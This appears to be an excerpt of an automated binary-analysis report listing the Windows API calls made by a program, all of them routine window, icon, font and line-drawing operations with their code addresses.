                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040BF69
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C0C1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C171
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C19D
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C1F0
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C385
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C465
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040C557
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C5C8
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C748
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C774
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C7C7
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040C84D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C8E1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CA25
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040CBA1
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040CBF4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040CC7A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CD63
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CE92
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D044
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D0B7
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D269
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D283
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D349
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D491
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D4BD
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D510
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D596
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D69C
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D786
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D835
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D861
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D8B4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D93A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D9CE
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DB57
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DBAA
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DC30
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040DDA1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DE71
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DEC4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DF4A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E05E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E114
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E167
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040E1F4
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E363
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
